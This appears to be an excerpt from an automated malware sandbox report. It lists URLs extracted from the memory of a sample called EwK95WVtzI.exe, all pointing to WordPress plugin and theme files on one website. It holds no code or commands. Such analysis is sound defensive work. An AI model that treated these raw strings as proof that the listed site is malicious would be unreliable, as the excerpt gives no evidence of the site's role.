                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.16.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.16.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.16.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.16.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.16.4
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.16
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.5
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.62
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/js/ooohboi-steroids.js?
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/flipbook.style.css?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/font-awesome.css?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/embed.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.book3.min.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.min.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.swipe.min.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.webgl.min.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/iscroll.min.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/pdf.min.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/three.min.js?ver=3.25
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/tfc-product-catalog/tfc-product-catalog.js?ver=1.0.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/css.css?ver=2.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/antiscroll/js.js?ver=2.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/css.min.css?ver=2.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/css.css?ver=2.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/freeze_table/js.js?ver=2.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/js.min.js?ver=2.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/css.css?ver=2.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/wc-product-table-pro/assets/multirange/js.js?ver=2.1.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=8.1.1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=8.1.1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ve
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-all-blocks-s
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendo
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/style.min.css?ver=2.8.1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.8.1
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/themes/hello-theme-child/style.css?ver=1.0.0
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-158.css?ver=1696184345
                Source: EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1871271742.0000000003B50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1907243367.0000000001450000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/uploads/elementor/css/post-330.css?ver=1696184345
